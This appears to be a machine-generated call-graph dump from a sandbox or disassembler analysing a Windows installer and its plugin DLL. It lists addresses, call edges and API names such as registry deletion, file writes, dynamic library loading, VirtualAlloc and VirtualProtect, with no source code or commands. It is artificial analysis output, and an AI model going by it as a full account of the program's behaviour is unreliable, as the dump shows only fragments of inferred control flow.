4508->4507 4510 406213 GetShortPathNameW 4509->4510 4511 4061ed 4509->4511 4513 406332 4510->4513 4514 406228 4510->4514 4536 406067 GetFileAttributesW CreateFileW 4511->4536 4513->4400 4514->4513 4516 406230 wsprintfA 4514->4516 4515 4061f7 CloseHandle GetShortPathNameW 4515->4513 4517 40620b 4515->4517 4518 4065b4 21 API calls 4516->4518 4517->4510 4517->4513 4519 406258 4518->4519 4537 406067 GetFileAttributesW CreateFileW 4519->4537 4521 406265 4521->4513 4522 406274 GetFileSize GlobalAlloc 4521->4522 4523 406296 4522->4523 4524 40632b CloseHandle 4522->4524 4525 4060ea ReadFile 4523->4525 4524->4513 4526 40629e 4525->4526 4526->4524 4538 405fcc lstrlenA 4526->4538 4529 4062b5 lstrcpyA 4532 4062d7 4529->4532 4530 4062c9 4531 405fcc 4 API calls 4530->4531 4531->4532 4533 40630e SetFilePointer 4532->4533 4534 406119 WriteFile 4533->4534 4535 406324 GlobalFree 4534->4535 4535->4524 4536->4515 4537->4521 4539 40600d lstrlenA 4538->4539 4540 406015 4539->4540 4541 405fe6 lstrcmpiA 4539->4541 4540->4529 4540->4530 4541->4540 4542 406004 CharNextA 4541->4542 4542->4539 4544 403bc2 4543->4544 4545 403b8c 4544->4545 4546 403bc7 FreeLibrary GlobalFree 4544->4546 4545->4409 4546->4545 4546->4546 5119 401a55 5120 402dcb 21 API calls 5119->5120 5121 401a5e ExpandEnvironmentStringsW 5120->5121 5122 401a72 5121->5122 5124 401a85 5121->5124 5123 401a77 lstrcmpW 5122->5123 5122->5124 5123->5124 4589 4014d7 4590 402da9 21 API calls 4589->4590 4591 4014dd Sleep 4590->4591 4593 402c4f 4591->4593 5130 4023d7 5131 4023e5 5130->5131 5132 4023df 5130->5132 5133 4023f3 5131->5133 5135 402dcb 21 API calls 5131->5135 5134 402dcb 21 API calls 5132->5134 5136 402401 5133->5136 5137 402dcb 21 API calls 5133->5137 5134->5131 5135->5133 5138 402dcb 21 API calls 5136->5138 5137->5136 5139 40240a WritePrivateProfileStringW 5138->5139 4599 402459 4600 402461 4599->4600 4601 40248c 4599->4601 4602 402e0b 21 API calls 4600->4602 4603 402dcb 21 API calls 4601->4603 4604 402468 4602->4604 4605 402493 4603->4605 4607 402472 4604->4607 4608 4024a0 4604->4608 4611 402e89 4605->4611 4609 402dcb 21 API calls 4607->4609 4610 402479 RegDeleteValueW RegCloseKey 4609->4610 4610->4608 4612 402e96 4611->4612 4613 402e9d 4611->4613 4612->4608 4613->4612 4615 402ece 4613->4615 4616 4063e4 RegOpenKeyExW 4615->4616 4617 402efc 4616->4617 4618 402fb1 4617->4618 4619 402f06 4617->4619 4618->4612 4620 402f0c RegEnumValueW 4619->4620 4627 402f2f 4619->4627 4621 402f96 RegCloseKey 4620->4621 4620->4627 4621->4618 4622 402f6b RegEnumKeyW 4623 402f74 RegCloseKey 4622->4623 4622->4627 4624 40696b 5 API calls 4623->4624 4625 402f84 4624->4625 4628 402fa6 4625->4628 4629 402f88 RegDeleteKeyW 4625->4629 4626 402ece 6 API calls 4626->4627 4627->4621 4627->4622 4627->4623 4627->4626 4628->4618 4629->4618 5140 40175a 5141 402dcb 21 API calls 5140->5141 5142 401761 SearchPathW 5141->5142 5143 40177c 5142->5143 5144 6fc41058 5146 6fc41074 5144->5146 5145 6fc410dd 5146->5145 5147 6fc41092 5146->5147 5157 6fc415b6 5146->5157 5149 6fc415b6 GlobalFree 5147->5149 5150 6fc410a2 5149->5150 5151 6fc410b2 5150->5151 5152 6fc410a9 GlobalSize 5150->5152 5153 6fc410b6 GlobalAlloc 5151->5153 5155 6fc410c7 5151->5155 5152->5151 5154 6fc415dd 3 API calls 5153->5154 5154->5155 5156 6fc410d2 GlobalFree 5155->5156 5156->5145 5159 6fc415bc 5157->5159 5158 6fc415c2 5158->5147 5159->5158 5160 6fc415ce GlobalFree 5159->5160 5160->5147 5161 401d5d 5162 402da9 21 API calls 5161->5162 5163 401d64 5162->5163 5164 402da9 21 API calls 5163->5164 5165 401d70 GetDlgItem 5164->5165 5166 40265d 5165->5166 5167 402663 5168 402692 5167->5168 5169 402677 5167->5169 5170 4026c2 5168->5170 5171 402697 5168->5171 5172 402da9 21 API calls 5169->5172 5174 402dcb 21 API calls 5170->5174 5173 402dcb 21 API calls 5171->5173 5175 40267e 5172->5175 5176 40269e 5173->5176 5177 4026c9 lstrlenW 5174->5177 5180 4026f6 5175->5180 5182 40270c 5175->5182 5183 406148 5 API calls 5175->5183 5184 406599 WideCharToMultiByte 5176->5184 5177->5175 5179 4026b2 lstrlenA 5179->5175 5181 406119 WriteFile 5180->5181 5180->5182 5181->5182 5183->5180 5184->5179 5185 404f63 GetDlgItem GetDlgItem 5186 404fb5 7 API calls 5185->5186 5192 4051da 5185->5192 5187 40505c DeleteObject 5186->5187 5188 40504f SendMessageW 5186->5188 5189 405065 5187->5189 5188->5187 5190 40509c 5189->5190 5193 4065b4 21 API calls 5189->5193 5194 4044f6 22 API calls 5190->5194 5191 4052bc 5195 405368 5191->5195 5206 405315 SendMessageW 5191->5206 5228 4051cd 5191->5228 5192->5191 5200 405249 5192->5200 5239 404eb1 SendMessageW 5192->5239 5198 40507e SendMessageW SendMessageW 5193->5198 5199 4050b0 5194->5199 5196 405372 SendMessageW 5195->5196 5197 40537a 5195->5197 5196->5197 5203 4053a3 5197->5203 5208 405393 5197->5208 5209 40538c ImageList_Destroy 5197->5209 5198->5189 5205 4044f6 22 API calls 5199->5205 5200->5191 5201 4052ae SendMessageW 5200->5201 5201->5191 5202 40455d 8 API calls 5207 405569 5202->5207 5211 40551d 5203->5211 5232 4053de 5203->5232 5244 404f31 5203->5244 5210 4050c1 5205->5210 5212 40532a SendMessageW 5206->5212 5206->5228 5208->5203 5213 40539c GlobalFree 5208->5213 5209->5208 5214 40519c GetWindowLongW SetWindowLongW 5210->5214 5220 405197 5210->5220 5223 405114 SendMessageW 5210->5223 5225 405152 SendMessageW 5210->5225 5226 405166 SendMessageW 5210->5226 5217 40552f ShowWindow GetDlgItem ShowWindow 5211->5217 5211->5228 5216 40533d 5212->5216 5213->5203 5215 4051b5 5214->5215 5218 4051d2 5215->5218 5219 4051ba ShowWindow 5215->5219 5224 40534e SendMessageW 5216->5224 5217->5228 5238 40452b SendMessageW 5218->5238 5237 40452b SendMessageW 5219->5237 5220->5214 5220->5215 5223->5210 5224->5195 5225->5210 5226->5210 5228->5202 5229 4054e8 5230 4054f3 InvalidateRect 5229->5230 5233 4054ff 5229->5233 5230->5233 5231 40540c SendMessageW 5235 405422 5231->5235 5232->5231 5232->5235 5233->5211 5253 404e6c 5233->5253 5234 405496 SendMessageW SendMessageW 5234->5235 5235->5229 5235->5234 5237->5228 5238->5192 5240 404f10 SendMessageW 5239->5240 5241 404ed4 GetMessagePos ScreenToClient SendMessageW 5239->5241 5243 404f08 5240->5243 5242 404f0d 5241->5242 5241->5243 5242->5240 5243->5200 5256 406577 lstrcpynW 5244->5256 5246 404f44 5257 4064be wsprintfW 5246->5257 5248 404f4e 5249 40140b 2 API calls 5248->5249 5250 404f57 5249->5250 5258 406577 lstrcpynW 5250->5258 5252 404f5e 5252->5232 5259 404da3 5253->5259 5255 404e81 5255->5211 5256->5246 5257->5248 5258->5252 5260 404dbc 5259->5260 5261 4065b4 21 API calls 5260->5261 5262 404e20 5261->5262 5263 4065b4 21 API calls 5262->5263 5264 404e2b 5263->5264 5265 4065b4 21 API calls 5264->5265 5266 404e41 lstrlenW wsprintfW SetDlgItemTextW 5265->5266 5266->5255 5267 6fc410e1 5273 6fc41111 5267->5273 5268 6fc412b0 GlobalFree 5269 6fc411d7 GlobalAlloc 5269->5273 5270 6fc41240 GlobalFree 5270->5273 5271 6fc412ab 5271->5268 5272 6fc4135a 2 API calls 5272->5273 5273->5268 5273->5269 5273->5270 5273->5271 5273->5272 5274 6fc41312 2 API calls 5273->5274 5275 6fc4129a GlobalFree 5273->5275 5276 6fc4116b GlobalAlloc 5273->5276 5277 6fc41381 lstrcpyW 5273->5277 5274->5273 5275->5273 5276->5273 5277->5273 4670 4015e6 4671 402dcb 21 API calls 4670->4671 4672 4015ed 4671->4672 4673 405ef1 4 API calls 4672->4673 4685 4015f6 4673->4685 4674 401656 4676 401688 4674->4676 4677 40165b 4674->4677 4675 405e73 CharNextW 4675->4685 4680 401423 28 API calls 4676->4680 4678 401423 28 API calls 4677->4678 4679 401662 4678->4679 4689 406577 lstrcpynW 4679->4689 4686 401680 4680->4686 4682 405b25 2 API calls 4682->4685 4683 405b42 5 API calls 4683->4685 4684 40166f SetCurrentDirectoryW 4684->4686 4685->4674 4685->4675 4685->4682 4685->4683 4687 40163c GetFileAttributesW 4685->4687 4688 405acb 2 API calls 4685->4688 4687->4685 4688->4685 4689->4684 5278 404666 lstrlenW 5279 404685 5278->5279 5280 404687 WideCharToMultiByte 5278->5280 5279->5280 5281 4049e7 5282 404a13 5281->5282 5283 404a24 5281->5283 5342 405bbb GetDlgItemTextW 5282->5342 5284 404a30 GetDlgItem 5283->5284 5291 404a8f 5283->5291 5286 404a44 5284->5286 5290 404a58 SetWindowTextW 5286->5290 5295 405ef1 4 API calls 5286->5295 5287 404b73 5292 404d22 5287->5292 5344 405bbb GetDlgItemTextW 5287->5344 5288 404a1e 5289 406825 5 API calls 5288->5289 5289->5283 5296 4044f6 22 API calls 5290->5296 5291->5287 5291->5292 5297 4065b4 21 API calls 5291->5297 5294 40455d 8 API calls 5292->5294 5299 404d36 5294->5299 5300 404a4e 5295->5300 5301 404a74 5296->5301 5302 404b03 SHBrowseForFolderW 5297->5302 5298 404ba3 5303 405f4e 18 API calls 5298->5303 5300->5290 5307 405e46 3 API calls 5300->5307 5304 4044f6 22 API calls 5301->5304 5302->5287 5305 404b1b CoTaskMemFree 5302->5305 5306 404ba9 5303->5306 5308 404a82 5304->5308 5309 405e46 3 API calls 5305->5309 5345 406577 lstrcpynW 5306->5345 5307->5290 5343 40452b SendMessageW 5308->5343 5311 404b28 5309->5311 5314 404b5f SetDlgItemTextW 5311->5314 5318 4065b4 21 API calls 5311->5318 5313 404a88 5317 40696b 5 API calls 5313->5317 5314->5287 5315 404bc0 5316 40696b 5 API calls 5315->5316 5324 404bc7 5316->5324 5317->5291 5319 404b47 lstrcmpiW 5318->5319 5319->5314 5321 404b58 lstrcatW 5319->5321 5320 404c08 5346 406577 lstrcpynW 5320->5346 5321->5314 5323 404c0f 5325 405ef1 4 API calls 5323->5325 5324->5320 5329 405e92 2 API calls 5324->5329 5330 404c60 5324->5330 5326 404c15 GetDiskFreeSpaceW 5325->5326 5328 404c39 MulDiv 5326->5328 5326->5330 5328->5330 5329->5324 5331 404cd1 5330->5331 5333 404e6c 24 API calls 5330->5333 5332 404cf4 5331->5332 5334 40140b 2 API calls 5331->5334 5347 404518 KiUserCallbackDispatcher 5332->5347 5335 404cbe 5333->5335 5334->5332 5336 404cd3 SetDlgItemTextW 5335->5336 5337 404cc3 5335->5337 5336->5331 5339 404da3 24 API calls 5337->5339 5339->5331 5340 404d10 5340->5292 5348 404940 5340->5348 5342->5288 5343->5313 5344->5298 5345->5315 5346->5323 5347->5340 5349 404953 SendMessageW 5348->5349 5350 40494e 5348->5350 5349->5292 5350->5349 5351 401c68 5352 402da9 21 API calls 5351->5352 5353 401c6f 5352->5353 5354 402da9 21 API calls 5353->5354 5355 401c7c 5354->5355 5356 401c91 5355->5356 5358 402dcb 21 API calls 5355->5358 5357 401ca1 5356->5357 5359 402dcb 21 API calls 5356->5359 5360 401cf8 5357->5360 5361 401cac 5357->5361 5358->5356 5359->5357 5363 402dcb 21 API calls 5360->5363 5362 402da9 21 API calls 5361->5362 5364 401cb1 5362->5364 5365 401cfd 5363->5365 5366 402da9 21 API calls 5364->5366 5367 402dcb 21 API calls 5365->5367 5369 401cbd 5366->5369 5368 401d06 FindWindowExW 5367->5368 5372 401d28 5368->5372 5370 401ce8 SendMessageW 5369->5370 5371 401cca SendMessageTimeoutW 5369->5371 5370->5372 5371->5372 5373 4028e9 5374 4028ef 5373->5374 5375 4028f7 FindClose 5374->5375 5376 402c4f 5374->5376 5375->5376 5377 6fc423e9 5378 6fc42453 5377->5378 5379 6fc4245e GlobalAlloc 5378->5379 5380 6fc4247d 5378->5380 5379->5378 5381 6fc41774 5382 6fc417a3 5381->5382 5383 6fc41bff 22 API calls 5382->5383 5384 6fc417aa 5383->5384 5385 6fc417b1 5384->5385 5386 6fc417bd 5384->5386 5387 6fc41312 2 API calls 5385->5387 5388 6fc417e4 5386->5388 5389 6fc417c7 5386->5389 5392 6fc417bb 5387->5392 5390 6fc4180e 5388->5390 5391 6fc417ea 5388->5391 5393 6fc415dd 3 API calls 5389->5393 5395 6fc415dd 3 API calls 5390->5395 5394 6fc41654 3 API calls 5391->5394 5396 6fc417cc 5393->5396 5397 6fc417ef 5394->5397 5395->5392 5398 6fc41654 3 API calls 5396->5398 5399 6fc41312 2 API calls 5397->5399 5400 6fc417d2 5398->5400 5401 6fc417f5 GlobalFree 5399->5401 5402 6fc41312 2 API calls 5400->5402 5401->5392 5404 6fc41809 GlobalFree 5401->5404 5403 6fc417d8 GlobalFree 5402->5403 5403->5392 5404->5392 5405 405570 5406 405580 5405->5406 5407 405594 5405->5407 5408 405586 5406->5408 5409 4055dd 5406->5409 5410 40559c IsWindowVisible 5407->5410 5416 4055b3 5407->5416 5412 404542 SendMessageW 5408->5412 5411 4055e2 CallWindowProcW 5409->5411 5410->5409 5413 4055a9 5410->5413 5415 405590 5411->5415 5412->5415 5414 404eb1 5 API calls 5413->5414 5414->5416 5416->5411 5417 404f31 4 API calls 5416->5417 5417->5409 5418 4016f1 5419 402dcb 21 API calls 5418->5419 5420 4016f7 GetFullPathNameW 5419->5420 5421 401711 5420->5421 5427 401733 5420->5427 5424 4068d4 2 API calls 5421->5424 5421->5427 5422 401748 GetShortPathNameW 5423 402c4f 5422->5423 5425 401723 5424->5425 5425->5427 5428 406577 lstrcpynW 5425->5428 5427->5422 5427->5423 5428->5427 5429 401e73 GetDC 5430 402da9 21 API calls 5429->5430 5431 401e85 GetDeviceCaps MulDiv ReleaseDC 5430->5431 5432 402da9 21 API calls 5431->5432 5433 401eb6 5432->5433 5434 4065b4 21 API calls 5433->5434 5435 401ef3 CreateFontIndirectW 5434->5435 5436 40265d 5435->5436 5437 4014f5 SetForegroundWindow 5438 402c4f 5437->5438 5439 402975 5440 402dcb 21 API calls 5439->5440 5441 402981 5440->5441 5442 402997 5441->5442 5443 402dcb 21 API calls 5441->5443 5444 406042 2 API calls 5442->5444 5443->5442 5445 40299d 5444->5445 5467 406067 GetFileAttributesW CreateFileW 5445->5467 5447 4029aa 5448 402a60 5447->5448 5449 4029c5 GlobalAlloc 5447->5449 5450 402a48 5447->5450 5451 402a67 DeleteFileW 5448->5451 5452 402a7a 5448->5452 5449->5450 5453 4029de 5449->5453 5454 4032d9 35 API calls 5450->5454 5451->5452 5468 40350a SetFilePointer 5453->5468 5456 402a55 CloseHandle 5454->5456 5456->5448 5457 4029e4 5458 4034f4 ReadFile 5457->5458 5459 4029ed GlobalAlloc 5458->5459 5460 402a31 5459->5460 5461 4029fd 5459->5461 5463 406119 WriteFile 5460->5463 5462 4032d9 35 API calls 5461->5462 5466 402a0a 5462->5466 5464 402a3d GlobalFree 5463->5464 5464->5450 5465 402a28 GlobalFree 5465->5460 5466->5465 5467->5447 5468->5457 4730 403ff7 4731 404170 4730->4731 4732 40400f 4730->4732 4734 404181 GetDlgItem GetDlgItem 4731->4734 4735 4041c1 4731->4735 4732->4731 4733 40401b 4732->4733 4737 404026 SetWindowPos 4733->4737 4738 404039 4733->4738 4739 4044f6 22 API calls 4734->4739 4736 40421b 4735->4736 4744 401389 2 API calls 4735->4744 4740 404542 SendMessageW 4736->4740 4757 40416b 4736->4757 4737->4738 4741 404042 ShowWindow 4738->4741 4742 404084 4738->4742 4743 4041ab SetClassLongW 4739->4743 4774 40422d 4740->4774 4745 404062 GetWindowLongW 4741->4745 4746 40415d 4741->4746 4747 4040a3 4742->4747 4748 40408c DestroyWindow 4742->4748 4749 40140b 2 API calls 4743->4749 4752 4041f3 4744->4752 4745->4746 4754 40407b ShowWindow 4745->4754 4812 40455d 4746->4812 4750 4040a8 SetWindowLongW 4747->4750 4751 4040b9 4747->4751 4802 40447f 4748->4802 4749->4735 4750->4757 4751->4746 4755 4040c5 GetDlgItem 4751->4755 4752->4736 4756 4041f7 SendMessageW 4752->4756 4754->4742 4760 4040f3 4755->4760 4761 4040d6 SendMessageW IsWindowEnabled 4755->4761 4756->4757 4758 40140b 2 API calls 4758->4774 4759 404481 DestroyWindow EndDialog 4759->4802 4764 404100 4760->4764 4766 404147 SendMessageW 4760->4766 4767 404113 4760->4767 4776 4040f8 4760->4776 4761->4757 4761->4760 4762 4044b0 ShowWindow 4762->4757 4763 4065b4 21 API calls 4763->4774 4764->4766 4764->4776 4766->4746 4769 404130 4767->4769 4770 40411b 4767->4770 4768 40412e 4768->4746 4772 40140b 2 API calls 4769->4772 4773 40140b 2 API calls 4770->4773 4771 4044f6 22 API calls 4771->4774 4775 404137 4772->4775 4773->4776 4774->4757 4774->4758 4774->4759 4774->4763 4774->4771 4793 4043c1 DestroyWindow 4774->4793 4803 4044f6 4774->4803 4775->4746 4775->4776 4809 4044cf 4776->4809 4778 4042a8 GetDlgItem 4779 4042c5 ShowWindow KiUserCallbackDispatcher 4778->4779 4780 4042bd 4778->4780 4806 404518 KiUserCallbackDispatcher 4779->4806 4780->4779 4782 4042ef EnableWindow 4787 404303 4782->4787 4783 404308 GetSystemMenu EnableMenuItem SendMessageW 4784 404338 SendMessageW 4783->4784 4783->4787 4784->4787 4786 403fd8 22 API calls 4786->4787 4787->4783 4787->4786 4807 40452b SendMessageW 4787->4807 4808 406577 lstrcpynW 4787->4808 4789 404367 lstrlenW 4790 4065b4 21 API calls 4789->4790 4791 40437d SetWindowTextW 4790->4791 4792 401389 2 API calls 4791->4792 4792->4774 4794 4043db CreateDialogParamW 4793->4794 4793->4802 4795 40440e 4794->4795 4794->4802 4796 4044f6 22 API calls 4795->4796 4797 404419 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4796->4797 4798 401389 2 API calls 4797->4798 4799 40445f 4798->4799 4799->4757 4800 404467 ShowWindow 4799->4800 4801 404542 SendMessageW 4800->4801 4801->4802 4802->4757 4802->4762 4804 4065b4 21 API calls 4803->4804 4805 404501 SetDlgItemTextW 4804->4805 4805->4778 4806->4782 4807->4787 4808->4789 4810 4044d6 4809->4810 4811 4044dc SendMessageW 4809->4811 4810->4811 4811->4768 4813 404575 GetWindowLongW 4812->4813 4823 404620 4812->4823 4814 40458a 4813->4814 4813->4823 4815 4045b7 GetSysColor 4814->4815 4816 4045ba 4814->4816 4814->4823 4815->4816 4817 4045c0 SetTextColor 4816->4817 4818 4045ca SetBkMode 4816->4818 4817->4818 4819 4045e2 GetSysColor 4818->4819 4820 4045e8 4818->4820 4819->4820 4821 4045f9 4820->4821 4822 4045ef SetBkColor 4820->4822 4821->4823 4824 404613 CreateBrushIndirect 4821->4824 4825 40460c DeleteObject 4821->4825 4822->4821 4823->4757 4824->4823 4825->4824 4826 6fc42a7f 4827 6fc42acf 4826->4827 4828 6fc42a8f VirtualProtect 4826->4828 4828->4827 5469 40197b 5470 402dcb 21 API calls 5469->5470 5471 401982 lstrlenW 5470->5471 5472 40265d 5471->5472 4879 4020fd 4880 4021c1 4879->4880 4881 40210f 4879->4881 4884 401423 28 API calls 4880->4884 4882 402dcb 21 API calls 4881->4882 4883 402116 4882->4883 4885 402dcb 21 API calls 4883->4885 4890 40231b 4884->4890 4886 40211f 4885->4886 4887 402135 LoadLibraryExW 4886->4887 4888 402127 GetModuleHandleW 4886->4888 4887->4880 4889 402146 4887->4889 4888->4887 4888->4889 4902 4069da 4889->4902 4893 402190 4895 4055fc 28 API calls 4893->4895 4894 402157 4896 402176 4894->4896 4897 40215f 4894->4897 4898 402167 4895->4898 4907 6fc41817 4896->4907 4899 401423 28 API calls 4897->4899 4898->4890 4900 4021b3 FreeLibrary 4898->4900 4899->4898 4900->4890 4949 406599 WideCharToMultiByte 4902->4949 4904 4069f7 4905 402151 4904->4905 4906 4069fe GetProcAddress 4904->4906 4905->4893 4905->4894 4906->4905 4908 6fc4184a 4907->4908 4950 6fc41bff 4908->4950 4910 6fc41851 4911 6fc41976 4910->4911 4912 6fc41862 4910->4912 4913 6fc41869 4910->4913 4911->4898 5000 6fc4243e 4912->5000 4984 6fc42480 4913->4984 4918 6fc418cd 4924 6fc418d3 4918->4924 4925 6fc4191e 4918->4925 4919 6fc418af 5013 6fc42655 4919->5013 4920 6fc4187f 4923 6fc41885 4920->4923 4929 6fc41890 4920->4929 4921 6fc41898 4932 6fc4188e 4921->4932 5010 6fc42e23 4921->5010 4923->4932 4994 6fc42b98 4923->4994 5032 6fc41666 4924->5032 4927 6fc42655 10 API calls 4925->4927 4933 6fc4190f 4927->4933 4928 6fc418b5 5024 6fc41654 4928->5024 5004 6fc42810 4929->5004 4932->4918 4932->4919 4940 6fc41965 4933->4940 5038 6fc42618 4933->5038 4938 6fc41896 4938->4932 4939 6fc42655 10 API calls 4939->4933 4940->4911 4942 6fc4196f GlobalFree 4940->4942 4942->4911 4946 6fc41951 4946->4940 5042 6fc415dd wsprintfW 4946->5042 4947 6fc4194a FreeLibrary 4947->4946 4949->4904 5045 6fc412bb GlobalAlloc 4950->5045 4952 6fc41c26 5046 6fc412bb GlobalAlloc 4952->5046 4954 6fc41e6b GlobalFree GlobalFree GlobalFree 4955 6fc41e88 4954->4955 4968 6fc41ed2 4954->4968 4956 6fc4227e 4955->4956 4964 6fc41e9d 4955->4964 4955->4968 4958 6fc422a0 GetModuleHandleW 4956->4958 4956->4968 4957 6fc41d26 GlobalAlloc 4974 6fc41c31 4957->4974 4960 6fc422c6 4958->4960 4961 6fc422b1 LoadLibraryW 4958->4961 4959 6fc41d8f GlobalFree 4959->4974 5053 6fc416bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4960->5053 4961->4960 4961->4968 4962 6fc41d71 lstrcpyW 4963 6fc41d7b lstrcpyW 4962->4963 4963->4974 4964->4968 5049 6fc412cc 4964->5049 4966 6fc42318 4966->4968 4971 6fc42325 lstrlenW 4966->4971 4967 6fc42126 5052 6fc412bb GlobalAlloc 4967->5052 4968->4910 5054 6fc416bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4971->5054 4972 6fc422d8 4972->4966 4982 6fc42302 GetProcAddress 4972->4982 4974->4954 4974->4957 4974->4959 4974->4962 4974->4963 4974->4967 4974->4968 4975 6fc42067 GlobalFree 4974->4975 4976 6fc421ae 4974->4976 4977 6fc412cc 2 API calls 4974->4977 4978 6fc41dcd 4974->4978 4975->4974 4976->4968 4981 6fc42216 lstrcpyW 4976->4981 4977->4974 4978->4974 5047 6fc4162f GlobalSize GlobalAlloc 4978->5047 4979 6fc4233f 4979->4968 4981->4968 4982->4966 4983 6fc4212f 4983->4910 4985 6fc42498 4984->4985 4987 6fc425c1 GlobalFree 4985->4987 4989 6fc42540 GlobalAlloc WideCharToMultiByte 4985->4989 4990 6fc4256b GlobalAlloc 4985->4990 4991 6fc412cc GlobalAlloc lstrcpynW 4985->4991 4992 6fc42582 4985->4992 5056 6fc4135a 4985->5056 4987->4985 4988 6fc4186f 4987->4988 4988->4920 4988->4921 4988->4932 4989->4987 4990->4992 4991->4985 4992->4987 5060 6fc427a4 4992->5060 4996 6fc42baa 4994->4996 4995 6fc42c4f CreateFileA 4997 6fc42c6d 4995->4997 4996->4995 5063 6fc42b42 4997->5063 4999 6fc42d39 4999->4932 5001 6fc42453 5000->5001 5002 6fc4245e GlobalAlloc 5001->5002 5003 6fc41868 5001->5003 5002->5001 5003->4913 5008 6fc42840 5004->5008 5005 6fc428ee 5007 6fc428f4 GlobalSize 5005->5007 5009 6fc428fe 5005->5009 5006 6fc428db GlobalAlloc 5006->5009 5007->5009 5008->5005 5008->5006 5009->4938 5011 6fc42e2e 5010->5011 5012 6fc42e6e GlobalFree 5011->5012 5067 6fc412bb GlobalAlloc 5013->5067 5015 6fc426d8 MultiByteToWideChar 5022 6fc4265f 5015->5022 5016 6fc426fa StringFromGUID2 5016->5022 5017 6fc4270b lstrcpynW 5017->5022 5018 6fc4271e wsprintfW 5018->5022 5019 6fc42742 GlobalFree 5019->5022 5020 6fc42777 GlobalFree 5020->4928 5021 6fc41312 2 API calls 5021->5022 5022->5015 5022->5016 5022->5017 5022->5018 5022->5019 5022->5020 5022->5021 5068 6fc41381 5022->5068 5072 6fc412bb GlobalAlloc 5024->5072 5026 6fc41659 5027 6fc41666 2 API calls 5026->5027 5028 6fc41663 5027->5028 5029 6fc41312 5028->5029 5030 6fc41355 GlobalFree 5029->5030 5031 6fc4131b GlobalAlloc lstrcpynW 5029->5031 5030->4933 5031->5030 5033 6fc41672 wsprintfW 5032->5033 5034 6fc4169f lstrcpyW 5032->5034 5037 6fc416b8 5033->5037 5034->5037 5037->4939 5039 6fc41931 5038->5039 5040 6fc42626 5038->5040 5039->4946 5039->4947 5040->5039 5041 6fc42642 GlobalFree 5040->5041 5041->5040 5043 6fc41312 2 API calls 5042->5043 5044 6fc415fe 5043->5044 5044->4940 5045->4952 5046->4974 5048 6fc4164d 5047->5048 5048->4978 5055 6fc412bb GlobalAlloc 5049->5055 5051 6fc412db lstrcpynW 5051->4968 5052->4983 5053->4972 5054->4979 5055->5051 5057 6fc41361 5056->5057 5058 6fc412cc 2 API calls 5057->5058 5059 6fc4137f 5058->5059 5059->4985 5061 6fc427b2 VirtualAlloc 5060->5061 5062 6fc42808 5060->5062 5061->5062 5062->4992 5064 6fc42b4d 5063->5064 5065 6fc42b52 GetLastError 5064->5065 5066 6fc42b5d 5064->5066 5065->5066 5066->4999 5067->5022 5069 6fc413ac 5068->5069 5070 6fc4138a 5068->5070 5069->5022 5070->5069 5071 6fc41390 lstrcpyW 5070->5071 5071->5069 5072->5026 5473 6fc41979 5474 6fc4199c 5473->5474 5475 6fc419d1 GlobalFree 5474->5475 5476 6fc419e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5474->5476 5475->5476 5477 6fc41312 2 API calls 5476->5477 5478 6fc41b6e GlobalFree GlobalFree 5477->5478 5479 402b7e 5480 402bd0 5479->5480 5481 402b85 5479->5481 5482 40696b 5 API calls 5480->5482 5483 402da9 21 API calls 5481->5483 5487 402bce 5481->5487 5484 402bd7 5482->5484 5486 402b93 5483->5486 5485 402dcb 21 API calls 5484->5485 5488 402be0 5485->5488 5489 402da9 21 API calls 5486->5489 5488->5487 5490 402be4 IIDFromString 5488->5490 5492 402b9f 5489->5492 5490->5487 5491 402bf3 5490->5491 5491->5487 5497 406577 lstrcpynW 5491->5497 5496 4064be wsprintfW 5492->5496 5494 402c10 CoTaskMemFree 5494->5487 5496->5487 5497->5494 5498 401000 5499 401037 BeginPaint GetClientRect 5498->5499 5500 40100c DefWindowProcW 5498->5500 5502 4010f3 5499->5502 5503 401179 5500->5503 5504 401073 CreateBrushIndirect FillRect DeleteObject 5502->5504 5505 4010fc 5502->5505 5504->5502 5506 401102 CreateFontIndirectW 5505->5506 5507 401167 EndPaint 5505->5507 5506->5507 5508 401112 6 API calls 5506->5508 5507->5503 5508->5507 4018 401781 4024 402dcb 4018->4024 4022 40178f 4023 406096 2 API calls 4022->4023 4023->4022 4025 402dd7 4024->4025 4026 4065b4 21 API calls 4025->4026 4027 402df8 4026->4027 4028 401788 4027->4028 4029 406825 5 API calls 4027->4029 4030 406096 4028->4030 4029->4028 4031 4060a3 GetTickCount GetTempFileNameW 4030->4031 4032 4060dd 4031->4032 4033 4060d9 4031->4033 4032->4022 4033->4031 4033->4032 5509 401d82 5510 402da9 21 API calls 5509->5510 5511 401d93 SetWindowLongW 5510->5511 5512 402c4f 5511->5512 4054 401f03 4055 402da9 21 API calls 4054->4055 4056 401f09 4055->4056 4057 402da9 21 API calls 4056->4057 4058 401f15 4057->4058 4059 401f21 ShowWindow 4058->4059 4060 401f2c EnableWindow 4058->4060 4061 402c4f 4059->4061 4060->4061 5513 401503 5514 401508 5513->5514 5515 40152e 5513->5515 5516 402da9 21 API calls 5514->5516 5516->5515 5517 402903 5518 40290b 5517->5518 5519 40290f FindNextFileW 5518->5519 5522 402921 5518->5522 5520 402968 5519->5520 5519->5522 5523 406577 lstrcpynW 5520->5523 5523->5522 5524 6fc41000 5527 6fc4101b 5524->5527 5528 6fc415b6 GlobalFree 5527->5528 5529 6fc41020 5528->5529 5530 6fc41024 5529->5530 5531 6fc41027 GlobalAlloc 5529->5531 5532 6fc415dd 3 API calls 5530->5532 5531->5530 5533 6fc41019 5532->5533 5534 403c07 5535 403c12 5534->5535 5536 403c16 5535->5536 5537 403c19 GlobalAlloc 5535->5537 5537->5536 5538 401588 5539 402bc9 5538->5539 5542 4064be wsprintfW 5539->5542 5541 402bce 5542->5541 5543 6fc4170d 5544 6fc415b6 GlobalFree 5543->5544 5546 6fc41725 5544->5546 5545 6fc4176b GlobalFree 5546->5545 5547 6fc41740 5546->5547 5548 6fc41757 VirtualFree 5546->5548 5547->5545 5548->5545 5549 40198d 5550 402da9 21 API calls 5549->5550 5551 401994 5550->5551 5552 402da9 21 API calls 5551->5552 5553 4019a1 5552->5553 5554 402dcb 21 API calls 5553->5554 5555 4019b8 lstrlenW 5554->5555 5556 4019c9 5555->5556 5557 401a0a 5556->5557 5561 406577 lstrcpynW 5556->5561 5559 4019fa 5559->5557 5560 4019ff lstrlenW 5559->5560 5560->5557 5561->5559 5562 40168f 5563 402dcb 21 API calls 5562->5563 5564 401695 